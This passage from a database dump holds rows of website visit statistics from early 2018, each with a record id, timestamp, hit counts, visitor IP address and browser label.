1,0,0,'66.249.66.74','chrome'),(214225,1519911254,1,1,0,0,'91.196.177.31','chrome'),(214226,1519912878,1,1,0,0,'91.196.177.46','chrome'),(214227,1519913065,1,1,0,0,'193.107.73.18','chrome'),(214228,1519913129,1,1,0,0,'216.244.66.237','other'),(214229,1519913149,2,0,2,0,'66.249.66.157',''),(214230,1519913822,1,1,0,0,'91.196.177.46','chrome'),(214231,1519914124,2,2,0,0,'91.196.178.73','chrome'),(214232,1519914496,1,1,0,0,'8.29.198.26','other'),(214233,1519914731,1,1,0,0,'91.196.177.46','chrome'),(214234,1519914751,1,0,1,0,'66.249.66.156',''),(214235,1519915579,1,1,0,0,'66.249.66.74','chrome'),(214236,1519916104,1,1,0,0,'157.55.39.121','other'),(214237,1519916251,1,1,0,0,'37.115.83.30','chrome'),(214238,1519916681,1,0,1,0,'66.249.66.156',''),(214239,1519916797,1,1,0,0,'95.132.9.198','chrome'),(214240,1519916838,1,1,0,0,'216.244.66.237','other'),(214241,1519917161,2,2,0,0,'91.196.178.86','chrome'),(214242,1519918957,1,1,0,0,'188.230.43.254','other'),(214243,1519919279,2,2,0,0,'77.111.244.62','chrome'),(214244,1519919854,1,0,1,0,'66.249.66.157',''),(214245,1519920017,1,1,0,0,'66.249.66.157','chrome'),(214246,1519920252,1,1,0,0,'66.249.66.76','chrome'),(214247,1519921047,1,1,0,0,'87.250.224.46','other'),(214248,1519921220,1,0,1,0,'66.249.66.156',''),(214249,1519921598,1,1,0,0,'188.230.43.254','other'),(214250,1519922698,1,1,0,0,'91.196.178.94','firefox'),(214251,1519923269,4,4,0,0,'178.154.171.88','other'),(214252,1519923272,1,1,0,0,'87.250.224.46','other'),(214253,1519923290,7,7,0,0,'141.8.142.74','other'),(214254,1519923326,1,1,0,0,'37.9.113.182','other'),(214255,1519923886,1,0,1,0,'66.249.66.155',''),(214256,1519923983,1,1,0,0,'216.244.66.237','other'),(214257,1519924369,1,1,0,0,'188.230.43.254','other'),(214258,1519924404,2,1,1,0,'66.249.66.155',''),(214259,1519924436,2,2,0,0,'91.196.178.26','chrome'),(214260,1519924510,1,1,0,0,'66.249.66.75','chrome'),(214261,1519924642,1,1,0,0,'35.153.66.129','other'),(214262,1519924696,1,1,0,0,'178.154.171.88','other'),(214263,1519925363,1,1,0,0,'8.29.198.27','other'),(214264,1519925785,1,1,0,0,'89.64.55.153','chrome'),(214265,1519927562,2,2,0,0,'94.179.247.52','chrome'),(214266,1519928782,1,1,0,0,'46.211.103.48','other'),(214267,1519928944,1,1,0,0,'180.76.15.136','other'),(214268,1519929537,1,1,0,0,'157.55.39.121','other'),(214269,1519929753,1,1,0,0,'66.249.66.156','chrome'),(214270,1519929791,1,1,0,0,'66.249.66.74','chrome'),(214271,1519930594,1,1,0,0,'141.8.142.74','other'),(214272,1519931172,1,1,0,0,'109.206.57.219','firefox'),(214273,1519932112,1,1,0,0,'157.55.39.121','other'),(214274,1519932554,5,5,0,0,'141.8.142.74','other'),(214275,1519932563,2,2,0,0,'178.154.171.88','other'),(214276,1519932567,1,1,0,0,'87.250.224.46','other'),(214277,1519932675,1,1,0,0,'193.194.127.222','firefox'),(214278,1519932788,1,0,1,0,'66.249.66.157',''),(214279,1519932932,1,1,0,0,'207.46.13.108','other'),(214280,1519933639,3,3,0,0,'141.8.142.74','other'),(214281,1519933685,1,1,0,0,'178.154.171.88','other'),(214282,1519933833,1,1,0,0,'40.77.167.60','other'),(214283,1519933938,1,1,0,0,'37.9.113.182','other'),(214284,1519933957,1,1,0,0,'87.250.224.46','other'),(214285,1519934119,1,0,1,0,'66.249.66.156',''),(214286,1519934742,1,1,0,0,'66.249.66.157','chrome'),(214287,1519934746,1,1,0,0,'66.249.66.75','chrome'),(214288,1519935150,1,1,0,0,'46.149.91.94','firefox'),(214289,1519935196,1,1,0,0,'141.8.142.74','other'),(214290,1519935211,1,1,0,0,'173.212.213.176','other'),(214291,1519936213,1,1,0,0,'8.29.198.27','other'),(214292,1519936226,1,0,1,0,'66.249.66.157',''),(214293,1519937029,1,1,0,0,'188.165.4.128','firefox'),(214294,1519937066,1,1,0,0,'216.244.66.237','other'),(214295,1519938467,1,1,0,0,'178.154.171.88','other'),(214296,1519938809,1,1,0,0,'80.252.155.198','chrome'),(214297,1519939319,1,1,0,0,'188.165.4.128','firefox'),(214298,1519939824,1,1,0,0,'141.8.142.74','other'),(214299,1519940515,1,1,0,0,'66.249.66.156','chrome'),(214300,1519940517,1,1,0,0,'66.249.66.76','chrome'),(214301,1519940595,1,1,0,0,'87.250.224.46','other'),(214302,1519941335,2,0,2,0,'66.249.66.157',''),(214303,1519941375,1,0,1,0,'66.249.66.155',''),(214304,1519942253,8,8,0,0,'178.154.171.88','other'),(214305,1519942255,12,12,0,0,'141.8.142.74','other'),(214306,1519942282,3,3,0,0,'87.250.224.46','other'),(214307,1519943674,1,1,0,0,'178.154.171.88','other'),(214308,1519944379,14,14,0,0,'23.237.4.26','other'),(214309,1519945434,1,0,1,0,'66.249.66.156',''),(214310,1519946727,1,1,0,0,'199.30.24.28','other'),(214311,1519947060,1,1,0,0,'8.29.198.25','other'),(214312,1519947150,1,1,0,0,'178.154.171.88','other'),(214313,1519948082,1,1,0,0,'66.249.66.155','chrome'),(214314,1519948086,1,1,0,0,'66.249.66.75','chrome'),(214315,1519950872,1,1,0,0,'178.154.171.88','other'),(214316,1519952659,1,0,1,0,'66.249.66.156',''),(214317,1519953007,1,1,0,0,'37.9.113.115','other'),(214318,1519953369,1,1,0,0,'66.249.66.156','chrome'),(214319,1519953735,1,1,0,0,'54.165.59.7','other'),(214320,1519953881,1,0,1,0,'66.249.66.155',''),(214321,1519954211,1,1,0,0,'207.46.13.55','other'),(214322,1519954422,1,1,0,0,'180.76.15.8','other'),(214323,1519954485,1,1,0,0,'178.154.171.88','other'),(214324,1519954545,1,1,0,0,'66.249.66.74','chrome'),(214325,1519955484,1,1,0,0,'178.154.171.88','other'),(214326,1519956900,1,0,1,0,'66.249.66.75',''),(214327,1519957239,1,1,0,0,'157.55.39.199','other'),(214328,1519957274,1,0,1,0,'66.249.66.156',''),(214329,1519957921,1,1,0,0,'8.29.198.26','other'),(214330,1519958034,1,1,0,0,'188.165.4.128','firefox'),(214331,1519958147,1,1,0,0,'66.249.66.156','chrome'),(214332,1519958296,1,1,0,0,'66.249.66.76','chrome'),(214333,1519959381,1,1,0,0,'216.244.66.237','other'),(214334,1519962393,1,0,1,0,'66.249.66.156',''),(214335,1519962460,1,1,0,0,'141.8.142.74','other'),(214336,1519963914,2,1,1,0,'66.249.66.156',''),(214337,1519963951,1,1,0,0,'66.249.66.76','chrome'),(214338,1519964427,1,0,1,0,'66.249.66.157',''),(214339,1519964909,1,1,0,0,'141.8.142.74','other'),(214340,1519965179,146,146,0,0,'94.154.239.69','other'),(214341,1519966217,1,1,0,0,'141.8.142.74','other'),(214342,1519966220,1,1,0,0,'178.154.171.88','other'),(214343,1519967120,1,1,0,0,'188.165.4.128','firefox'),(214344,1519968156,2,2,0,0,'178.154.171.88','other'),(214345,1519968259,1,1,0,0,'46.4.0.246','other'),(214346,1519968461,2,2,0,0,'141.8.142.74','other'),(214347,1519968768,1,1,0,0,'8.29.198.26','other'),(214348,1519968954,1,1,0,0,'66.249.66.156','chrome'),(214349,1519968964,1,1,0,0,'66.249.66.76','chrome'),(214350,1519969082,1,1,0,0,'40.77.167.29','other'),(214351,1519969128,1,1,0,0,'128.74.247.78','chrome'),(214352,1519970499,1,0,1,0,'66.249.66.156',''),(214353,1519970742,1,1,0,0,'91.196.177.46','chrome'),(214354,1519970902,1,0,1,0,'66.249.66.157',''),(214355,1519971221,1,1,0,0,'141.8.142.74','other'),(214356,1519971642,1,1,0,0,'91.196.178.65','firefox'),(214357,1519971765,1,1,0,0,'77.111.244.38','chrome'),(214358,1519972002,1,1,0,0,'216.244.66.237','other'),(214359,1519972091,2,2,0,0,'91.196.179.134','chrome'),(214360,1519972705,3,3,0,0,'91.196.178.161','chrome'),(214361,1519973204,2,2,0,0,'178.154.171.88','other'),(214362,1519974238,1,1,0,0,'66.249.66.157','chrome'),(214363,1519975052,1,1,0,0,'141.8.142.74','other'),(214364,1519975224,1,1,0,0,'40.77.167.125','other'),(214365,1519975371,1,1,0,0,'37.52.47.19','chrome'),(214366,1519975525,2,2,0,0,'195.230.119.34','chrome'),(214367,1519976118,1,1,0,0,'66.249.66.79','chrome'),(214368,1519976390,1,0,1,0,'66.249.66.155',''),(214369,1519976695,1,1,0,0,'91.196.179.138','chrome'),(214370,1519976911,1,0,1,0,'66.249.66.156',''),(214371,1519977402,1,1,0,0,'91.196.178.161','chrome'),(214372,1519977518,1,1,0,0,'188.230.43.254','other'),(214373,1519977567,1,1,0,0,'40.77.167.125','other'),(214374,1519977621,1,1,0,0,'91.196.178.161','firefox'),(214375,1519977638,2,2,0,0,'130.180.219.233','chrome'),(214376,1519978275,1,1,0,0,'217.76.198.186','chrome'),(214377,1519979525,1,1,0,0,'91.196.178.104','chrome'),(214378,1519979603,1,1,0,0,'8.29.198.26','other'),(214379,1519979630,1,1,0,0,'92.112.216.132','chrome'),(214380,1519979657,1,1,0,0,'91.209.11.178','chrome'),(214381,1519979935,1,1,0,0,'141.8.142.74','other'),(214382,1519980040,1,1,0,0,'193.106.144.50','chrome'),(214383,1519980807,1,1,0,0,'94.178.118.33','firefox'),(214384,1519981631,1,1,0,0,'66.249.66.155','chrome'),(214385,1519981702,1,1,0,0,'91.196.178.17','chrome'),(214386,1519981809,1,1,0,0,'94.178.118.33','firefox'),(214387,1519981843,1,1,0,0,'66.249.66.81','chrome'),(214388,1519982572,1,0,1,0,'66.249.66.155',''),(214389,1519982983,1,1,0,0,'94.178.118.33','firefox'),(214390,1519982996,1,1,0,0,'207.46.13.55','other'),(214391,1519983409,1,1,0,0,'141.8.142.74','other'),(214392,1519983722,1,1,0,0,'194.242.103.139','chrome'),(214393,1519984105,2,2,0,0,'91.196.178.161','chrome'),(214394,1519984330,1,1,0,0,'195.34.204.52','chrome'),(214395,1519984410,1,1,0,0,'162.210.196.98','other'),(214396,1519984412,1,1,0,0,'180.76.15.160','other'),(214397,1519984445,1,0,1,0,'66.249.66.155',''),(214398,1519985134,1,1,0,0,'91.196.179.138','chrome'),(214399,1519985564,1,1,0,0,'207.46.13.55','other'),(214400,1519985591,1,1,0,0,'91.196.178.161','chrome'),(214401,1519985949,1,0,1,0,'66.249.66.157',''),(214402,1519986965,1,1,0,0,'66.249.66.153','chrome'),(214403,1519987009,1,1,0,0,'66.249.66.76','chrome'),(214404,1519987038,2,2,0,0,'193.19.152.14','chrome'),(214405,1519987417,2,2,0,0,'216.244.66.237','other'),(214406,1519987742,1,0,1,0,'66.249.66.155',''),(214407,1519988361,2,2,0,0,'91.196.178.161','chrome'),(214408,1519988632,2,2,0,0,'130.180.219.233','chrome'),(214409,1519988935,2,2,0,0,'37.55.56.67','chrome'),(214410,1519988975,1,1,0,0,'180.76.15.9','other'),(214411,1519989585,1,1,0,0,'91.196.178.79','firefox'),(214412,1519989886,1,0,1,0,'66.249.66.157',''),(214413,1519990448,1,1,0,0,'8.29.198.25','other'),(214414,1519991112,1,1,0,0,'37.55.56.67','chrome'),(214415,1519991469,1,1,0,0,'91.219.220.202','firefox'),(214416,1519991573,1,0,1,0,'66.249.66.157',''),(214417,1519991774,1,1,0,0,'173.212.226.74','other'),(214418,1519992184,1,1,0,0,'66.249.66.156','chrome'),(214419,1519992208,1,1,0,0,'66.249.66.74','chrome'),(214420,1519992674,1,0,1,0,'66.249.66.157',''),(214421,1519992861,1,1,0,0,'216.244.66.237','other'),(214422,1519993252,2,2,0,0,'91.196.178.167','chrome'),(214423,1519994326,1,1,0,0,'141.8.142.74','other'),(214424,1519994403,4,4,0,0,'46.201.241.5','chrome'),(214425,1519995450,2,2,0,0,'91.196.178.167','chrome'),(214426,1519995908,5,5,0,0,'141.8.142.74','other'),(214427,1519996373,1,1,0,0,'92.113.109.41','chrome'),(214428,1519996549,1,1,0,0,'207.46.13.55','other'),(214429,1519996697,1,1,0,0,'92.113.188.43','chrome'),(214430,1519996743,5,5,0,0,'178.154.171.88','other'),(214431,1519996746,3,3,0,0,'37.9.113.182','other'),(214432,1519996753,1,1,0,0,'87.250.224.46','other'),(214433,1519997035,4,4,0,0,'195.10.210.70','chrome'),(214434,1519997538,1,1,0,0,'91.196.178.73','firefox'),(214435,1519997553,3,3,0,0,'141.8.142.74','other'),(214436,1519997676,1,1,0,0,'66.249.66.156','chrome'),(214437,1519997720,1,1,0,0,'66.249.66.76','chrome'),(214438,1519998171,1,1,0,0,'95.132.6.203','chrome'),(214439,1519998336,1,1,0,0,'178.154.171.88','other'),(214440,1519998464,1,1,0,0,'91.196.178.104','chrome'),(214441,1519998979,1,1,0,0,'141.8.142.74','other'),(214442,1519999234,1,0,1,0,'66.249.66.155',''),(214443,1519999818,1,1,0,0,'31.171.196.51','chrome'),(214444,1520000038,2,0,2,0,'66.249.66.156',''),(214445,1520000075,7,7,0,0,'46.4.91.109','other'),(214446,1520000441,1,0,1,0,'66.249.66.157',''),(214447,1520000836,1,1,0,0,'31.129.252.64','chrome'),(214448,1520001252,1,1,0,0,'77.111.244.56','chrome'),(214449,1520001290,1,1,0,0,'8.29.198.27','other'),(214450,1520001374,1,1,0,0,'77.111.244.62','chrome'),(214451,1520001796,1,0,1,0,'66.249.66.156',''),(214452,1520003206,1,1,0,0,'66.249.66.156','chrome'),(214453,1520003215,1,1,0,0,'66.249.66.75','chrome'),(214454,1520005336,1,1,0,0,'91.196.178.79','firefox'),(214455,1520006075,1,0,1,0,'66.249.66.157',''),(214456,1520006096,1,1,0,0,'207.46.13.55','other'),(214457,1520006243,1,1,0,0,'66.102.9.40','chrome'),(214458,1520006454,1,1,0,0,'141.8.142.74','other'),(214459,1520006736,1,1,0,0,'178.154.171.88','other'),(214460,1520006906,1,1,0,0,'66.249.66.156','chrome'),(214461,1520007555,1,1,0,0,'188.230.43.254','other'),(214462,1520008323,1,1,0,0,'66.249.66.75','chrome'),(214463,1520009226,1,0,1,0,'66.249.66.155',''),(214464,1520009237,1,0,1,0,'66.249.66.156',''),(214465,1520009634,1,1,0,0,'188.230.43.254','other'),(214466,1520010571,1,1,0,0,'87.250.224.46','other'),(214467,1520011070,1,1,0,0,'64.246.187.42','firefox'),(214468,1520011381,1,1,0,0,'141.8.142.74','other'),(214469,1520011399,2,0,2,0,'66.249.66.156',''),(214470,1520012128,1,1,0,0,'8.29.198.25','other'),(214471,1520012135,1,1,0,0,'66.249.66.157','chrome'),(214472,1520012249,1,1,0,0,'46.219.236.231','chrome'),(214473,1520012334,1,1,0,0,'188.230.43.254','other'),(214474,1520013900,1,1,0,0,'66.249.66.75','chrome'),(214475,1520015096,1,0,1,0,'66.249.66.157',''),(214476,1520015419,2,2,0,0,'91.196.178.9','chrome'),(214477,1520015584,1,1,0,0,'95.133.155.192','chrome'),(214478,1520015708,1,0,1,0,'66.249.66.156',''),(214479,1520016458,1,1,0,0,'31.13.114.209','other'),(214480,1520016619,1,0,1,0,'66.249.66.157',''),(214481,1520016954,1,0,1,0,'66.249.66.155',''),(214482,1520017706,1,1,0,0,'66.249.66.156','chrome'),(214483,1520017862,1,1,0,0,'37.73.226.7','chrome'),(214484,1520018500,1,0,1,0,'66.249.66.157',''),(214485,1520019359,1,1,0,0,'66.249.66.75','chrome'),(214486,1520020145,1,1,0,0,'178.154.171.88','other'),(214487,1520021621,1,0,1,0,'66.249.66.156',''),(214488,1520021804,1,1,0,0,'141.8.142.74','other'),(214489,1520022960,1,1,0,0,'8.29.198.26','other'),(214490,1520023060,1,1,0,0,'66.249.66.156','chrome'),(214491,1520023993,65,65,0,0,'147.135.128.113','other'),(214492,1520024017,1,1,0,0,'157.55.39.38','other'),(214493,1520024435,2,2,0,0,'216.244.66.237','other'),(214494,1520024746,2,0,2,0,'66.249.66.155',''),(214495,1520024868,1,1,0,0,'66.249.66.75','chrome'),(214496,1520024895,48,48,0,0,'147.135.128.113','other'),(214497,1520026743,1,1,0,0,'40.77.167.29','other'),(214498,1520028052,1,1,0,0,'66.249.66.157','chrome'),(214499,1520028320,1,1,0,0,'157.55.39.38','other'),(214500,1520028431,1,1,0,0,'141.8.142.74','other'),(214501,1520028443,1,1,0,0,'216.244.66.237','other'),(214502,1520028551,1,1,0,0,'66.249.66.76','chrome'),(214503,1520029430,1,1,0,0,'216.244.66.237','other'),(214504,1520031309,1,0,1,0,'66.249.66.155',''),(214505,1520032080,1,1,0,0,'66.249.66.156','chrome'),(214506,1520032791,1,1,0,0,'194.187.170.133','other'),(214507,1520033139,1,1,0,0,'216.244.66.237','other'),(214508,1520033335,1,1,0,0,'141.8.142.74','other'),(214509,1520033657,1,1,0,0,'66.249.66.76','chrome'),(214510,1520033806,1,1,0,0,'8.29.198.25','other'),(214511,1520034695,1,0,1,0,'66.249.66.157',''),(214512,1520036683,1,1,0,0,'128.69.225.216','msie'),(214513,1520037330,1,1,0,0,'66.249.66.156','chrome'),(214514,1520039221,1,1,0,0,'66.249.66.74','chrome'),(214515,1520040422,1,0,1,0,'66.249.66.157',''),(214516,1520041025,1,1,0,0,'216.244.66.237','other'),(214517,1520041791,1,1,0,0,'54.165.59.7','other'),(214518,1520042358,1,1,0,0,'178.140.124.33','chrome'),(214519,1520042571,1,1,0,0,'66.249.66.155','chrome'),(214520,1520042649,3,3,0,0,'141.8.142.74','other'),(214521,1520042650,1,1,0,0,'178.154.171.88','other'),(214522,1520044637,1,1,0,0,'8.29.198.27','other'),(214523,1520044680,1,1,0,0,'66.249.66.74','chrome'),(214524,1520044705,2,2,0,0,'216.244.66.237','other'),(214525,1520046468,1,0,1,0,'66.249.66.156',''),(214526,1520046852,1,1,0,0,'66.249.66.155','chrome'),(214527,1520047906,1,1,0,0,'54.165.59.7','other'),(214528,1520048989,1,1,0,0,'87.250.224.46','other'),(214529,1520049864,1,1,0,0,'34.204.61.197','other'),(214530,1520050293,1,1,0,0,'66.249.66.74','chrome'),(214531,1520050776,1,1,0,0,'34.204.61.197','other'),(214532,1520051121,1,1,0,0,'136.243.68.226','other'),(214533,1520051286,1,1,0,0,'141.8.142.74','other'),(214534,1520051341,1,0,1,0,'66.249.66.156',''),(214535,1520051690,1,1,0,0,'34.204.61.197','other'),(214536,1520051982,1,1,0,0,'66.249.66.155','chrome'),(214537,1520052522,1,1,0,0,'66.249.66.76','chrome'),(214538,1520052619,1,1,0,0,'34.204.61.197','other'),(214539,1520052766,1,0,1,0,'66.249.66.74',''),(214540,1520053197,1,0,1,0,'66.249.66.75',''),(214541,1520053545,1,1,0,0,'34.204.61.197','other'),(214542,1520053958,2,2,0,0,'54.165.59.7','other'),(214543,1520054015,1,1,0,0,'157.55.39.126','other'),(214544,1520054231,1,1,0,0,'216.244.66.237','other'),(214545,1520054437,1,0,1,0,'66.249.66.76',''),(214546,1520054467,1,1,0,0,'34.204.61.197','other'),(214547,1520054598,1,0,1,0,'66.249.66.155',''),(214548,1520055099,1,1,0,0,'66.249.66.76','chrome'),(214549,1520055389,1,1,0,0,'34.204.61.197','other'),(214550,1520055397,1,1,0,0,'141.8.142.74','other'),(214551,1520055466,1,1,0,0,'8.29.198.26','other'),(214552,1520055961,2,2,0,0,'54.165.59.7','other'),(214553,1520056233,1,0,1,0,'66.249.66.156',''),(214554,1520056316,1,1,0,0,'34.204.61.197','other'),(214555,1520057117,1,1,0,0,'66.249.66.156','chrome'),(214556,1520057221,1,1,0,0,'34.204.61.197','other'),(214557,1520057423,1,1,0,0,'180.76.15.24','other'),(214558,1520057509,2,2,0,0,'141.8.142.74','other'),(214559,1520057614,1,1,0,0,'91.196.177.46','chrome'),(214560,1520057787,1,1,0,0,'54.165.59.7','other'),(214561,1520058144,1,1,0,0,'34.204.61.197','other'),(214562,1520058172,2,2,0,0,'91.196.178.83','chrome'),(214563,1520058774,1,1,0,0,'54.165.59.7','other'),(214564,1520058795,2,2,0,0,'77.111.246.9','chrome'),(214565,1520059013,1,1,0,0,'66.249.66.74','chrome'),(214566,1520059075,1,1,0,0,'34.204.61.197','other'),(214567,1520059464,1,1,0,0,'157.55.39.38','other'),(214568,1520059601,1,1,0,0,'66.249.66.76','chrome'),(214569,1520060001,1,1,0,0,'34.204.61.197','other'),(214570,1520060284,1,1,0,0,'91.196.179.138','chrome'),(214571,1520060852,2,2,0,0,'216.244.66.237','other'),(214572,1520060926,1,1,0,0,'34.204.61.197','other'),(214573,1520060971,2,2,0,0,'91.196.178.166','chrome'),(214574,1520061282,1,0,1,0,'66.249.66.156',''),(214575,1520061561,1,1,0,0,'157.55.39.38','other'),(214576,1520061617,1,0,1,0,'66.249.66.75',''),(214577,1520061696,1,1,0,0,'91.196.177.4','firefox'),(214578,1520061824,1,0,1,0,'66.249.66.155',''),(214579,1520061851,1,1,0,0,'34.204.61.197','other'),(214580,1520061862,1,1,0,0,'207.46.13.55','other'),(214581,1520062202,1,1,0,0,'216.244.66.237','other'),(214582,1520062320,2,1,1,0,'66.249.66.157',''),(214583,1520062359,1,1,0,0,'91.124.44.68','chrome'),(214584,1520062411,1,1,0,0,'141.8.142.74','other'),(214585,1520062670,1,1,0,0,'95.134.97.244','chrome'),(214586,1520062777,1,1,0,0,'34.204.61.197','other'),(214587,1520062917,1,1,0,0,'157.55.39.38','other'),(214588,1520063302,1,0,1,0,'66.249.66.156',''),(214589,1520063521,1,1,0,0,'109.251.190.3','chrome'),(214590,1520063602,11,11,0,0,'37.187.75.71','other'),(214591,1520063628,2,2,0,0,'37.54.16.59','chrome'),(214592,1520063704,1,1,0,0,'34.204.61.197','other'),(214593,1520063962,1,1,0,0,'216.244.66.237','other'),(214594,1520064260,1,1,0,0,'91.196.178.83','firefox'),(214595,1520064417,2,1,1,0,'66.249.66.74',''),(214596,1520064625,1,1,0,0,'34.204.61.197','other'),(214597,1520064822,1,1,0,0,'185.126.254.24','firefox'),(214598,1520064986,1,1,0,0,'87.250.224.46','other'),(214599,1520065136,1,0,1,0,'66.249.66.75',''),(214600,1520065303,1,1,0,0,'23.103.64.39','other'),(214601,1520065509,1,1,0,0,'178.94.50.238','firefox'),(214602,1520065555,1,1,0,0,'34.204.61.197','other'),(214603,1520065891,1,1,0,0,'85.30.249.9','msie'),(214604,1520065892,1,1,0,0,'185.150.154.210','msie'),(214605,1520065899,1,1,0,0,'95.221.246.195','msie'),(214606,1520066178,2,2,0,0,'141.8.142.74','other'),(214607,1520066294,1,1,0,0,'8.29.198.25','other'),(214608,1520066456,1,1,0,0,'34.204.61.197','other'),(214609,1520066564,1,0,1,0,'66.249.66.157',''),(214610,1520066669,1,1,0,0,'176.214.49.220','chrome'),(214611,1520067382,1,1,0,0,'34.204.61.197','other'),(214612,1520067904,2,2,0,0,'91.196.178.90','chrome'),(214613,1520068135,1,0,1,0,'66.249.66.157',''),(214614,1520068181,1,1,0,0,'66.249.66.155','chrome'),(214615,1520068303,1,1,0,0,'34.204.61.197','other'),(214616,1520068365,1,1,0,0,'66.249.66.76','chrome'),(214617,1520069053,2,2,0,0,'91.196.178.90','chrome'),(214618,1520069222,1,1,0,0,'34.204.61.197','other'),(214619,1520069234,1,0,1,0,'66.249.66.155',''),(214620,1520069243,1,0,1,0,'66.249.66.156',''),(214621,1520070141,1,1,0,0,'34.204.61.197','other'),(214622,1520070920,1,1,0,0,'180.76.15.135','other'),(214623,1520071009,1,1,0,0,'178.92.73.129','chrome'),(214624,1520071070,1,1,0,0,'34.204.61.197','other'),(214625,1520071733,1,1,0,0,'141.8.142.74','other'),(214626,1520071995,1,1,0,0,'34.204.61.197','other'),(214627,1520072252,1,1,0,0,'91.196.177.46','chrome'),(214628,1520072569,2,0,2,0,'66.249.66.74',''),(214629,1520072917,1,1,0,0,'34.204.61.197','other'),(214630,1520073628,1,1,0,0,'66.249.66.76','chrome'),(214631,1520073796,1,1,0,0,'66.249.66.157','chrome'),(214632,1520073841,1,1,0,0,'34.204.61.197','other'),(214633,1520074345,1,1,0,0,'141.8.142.74','other'),(214634,1520074765,1,1,0,0,'34.204.61.197','other'),(214635,1520075246,1,0,1,0,'66.249.66.156',''),(214636,1520075454,1,1,0,0,'141.8.142.74','other'),(214637,1520075663,4,4,0,0,'195.201.34.121','other'),(214638,1520075693,1,1,0,0,'34.204.61.197','other'),(214639,1520076336,1,1,0,0,'157.55.39.38','other'),(214640,1520076410,1,1,0,0,'91.196.178.83','chrome'),(214641,1520076590,1,1,0,0,'77.111.246.9','chrome'),(214642,1520076618,1,1,0,0,'34.204.61.197','other'),(214643,1520077121,1,1,0,0,'8.29.198.27','other'),(214644,1520077542,1,1,0,0,'34.204.61.197','other'),(214645,1520078109,1,1,0,0,'62.44.134.64','chrome'),(214646,1520078460,1,1,0,0,'213.180.203.8','other'),(214647,1520078464,1,1,0,0,'34.204.61.197','other'),(214648,1520079385,1,1,0,0,'34.204.61.197','other'),(214649,1520079796,1,0,1,0,'66.249.66.156',''),(214650,1520080310,1,1,0,0,'34.204.61.197','other'),(214651,1520080533,1,1,0,0,'91.208.145.231','chrome'),(214652,1520080622,1,0,1,0,'66.249.66.157',''),(214653,1520080809,1,1,0,0,'66.249.66.75','chrome'),(214654,1520080827,1,1,0,0,'66.249.66.157','chrome'),(214655,1520081159,1,1,0,0,'77.111.244.17','chrome'),(214656,1520081230,1,1,0,0,'34.204.61.197','other'),(214657,1520081933,1,1,0,0,'94.180.166.241','msie'),(214658,1520082145,1,0,1,0,'66.249.66.74',''),(214659,1520082151,1,1,0,0,'34.204.61.197','other'),(214660,1520083060,1,0,1,0,'66.249.66.156',''),(214661,1520083072,1,1,0,0,'34.204.61.197','other'),(214662,1520083528,1,1,0,0,'151.80.203.177','firefox'),(214663,1520083534,1,1,0,0,'46.201.93.57','chrome'),(214664,1520083885,2,2,0,0,'92.113.188.43','chrome'),(214665,1520083998,1,1,0,0,'34.204.61.197','other'),(214666,1520084683,1,1,0,0,'66.249.66.156','chrome'),(214667,1520084908,1,1,0,0,'34.204.61.197','other'),(214668,1520085568,1,1,0,0,'91.196.178.54','chrome'),(214669,1520085837,1,1,0,0,'34.204.61.197','other'),(214670,1520086183,1,1,0,0,'66.249.66.74','chrome'),(214671,1520086193,1,1,0,0,'66.249.66.156','chrome'),(214672,1520086758,1,1,0,0,'34.204.61.197','other'),(214673,1520087679,1,1,0,0,'34.204.61.197','other'),(214674,1520087953,1,1,0,0,'8.29.198.26','other'),(214675,1520088593,1,1,0,0,'34.204.61.197','other'),(214676,1520088952,1,1,0,0,'54.67.59.131','chrome'),(214677,1520089519,1,1,0,0,'34.204.61.197','other'),(214678,1520089725,1,0,1,0,'66.249.66.156',''),(214679,1520090439,1,1,0,0,'34.204.61.197','other'),(214680,1520090830,2,2,0,0,'92.113.188.43','chrome'),(214681,1520091286,1,0,1,0,'66.249.66.155',''),(214682,1520091367,1,1,0,0,'34.204.61.197','other'),(214683,1520091378,1,1,0,0,'91.209.11.236','other'),(214684,1520091546,1,1,0,0,'66.249.66.76','chrome'),(214685,1520091547,1,1,0,0,'66.249.66.157','chrome'),(214686,1520092269,1,1,0,0,'34.204.61.197','other'),(214687,1520092846,1,1,0,0,'141.8.142.74','other'),(214688,1520093197,1,1,0,0,'34.204.61.197','other'),(214689,1520093909,1,1,0,0,'188.230.43.254','other'),(214690,1520094096,1,1,0,0,'178.154.171.88','other'),(214691,1520094121,1,1,0,0,'34.204.61.197','other'),(214692,1520094902,1,1,0,0,'188.230.43.254','other'),(214693,1520095026,1,1,0,0,'141.8.142.74','other'),(214694,1520095039,1,1,0,0,'34.204.61.197','other'),(214695,1520095093,1,0,1,0,'66.249.66.157',''),(214696,1520095247,1,1,0,0,'180.76.15.34','other'),(214697,1520095936,1,0,1,0,'66.249.66.75',''),(214698,1520095968,1,1,0,0,'34.204.61.197','other'),(214699,1520096030,1,1,0,0,'66.249.66.155','chrome'),(214700,1520096892,1,1,0,0,'34.204.61.197','other'),(214701,1520097054,1,0,1,0,'66.249.66.155',''),(214702,1520097108,1,1,0,0,'66.249.66.75','chrome'),(214703,1520097110,1,1,0,0,'66.249.66.157','chrome'),(214704,1520097237,1,1,0,0,'188.230.43.254','other'),(214705,1520097608,1,1,0,0,'216.244.66.237','other'),(214706,1520097694,1,0,1,0,'66.249.66.74',''),(214707,1520097821,1,1,0,0,'34.204.61.197','other'),(214708,1520098749,1,1,0,0,'91.196.178.94','firefox'),(214709,1520098750,1,1,0,0,'34.204.61.197','other'),(214710,1520098797,1,1,0,0,'8.29.198.27','other'),(214711,1520098915,1,1,0,0,'216.244.66.237','other'),(214712,1520099081,1,1,0,0,'91.196.178.164','chrome'),(214713,1520099673,1,1,0,0,'34.204.61.197','other'),(214714,1520100090,1,1,0,0,'141.8.142.74','other'),(214715,1520100592,1,1,0,0,'34.204.61.197','other'),(214716,1520101495,1,1,0,0,'34.204.61.197','other'),(214717,1520101723,2,0,2,0,'66.249.66.156',''),(214718,1520102393,1,1,0,0,'66.249.66.76','chrome'),(214719,1520102395,1,1,0,0,'66.249.66.156','chrome'),(214720,1520102417,1,1,0,0,'34.204.61.197','other'),(214721,1520102839,1,1,0,0,'37.73.244.83','chrome'),(214722,1520102910,1,0,1,0,'66.249.66.155',''),(214723,1520103319,1,1,0,0,'34.204.61.197','other'),(214724,1520104236,1,1,0,0,'34.204.61.197','other'),(214725,1520104255,1,1,0,0,'178.154.171.88','other'),(214726,1520104564,1,1,0,0,'193.194.127.222','firefox'),(214727,1520105165,1,1,0,0,'34.204.61.197','other'),(214728,1520106090,1,1,0,0,'34.204.61.197','other'),(214729,1520107012,1,1,0,0,'34.204.61.197','other'),(214730,1520107498,1,1,0,0,'216.244.66.237','other'),(214731,1520107635,1,1,0,0,'66.249.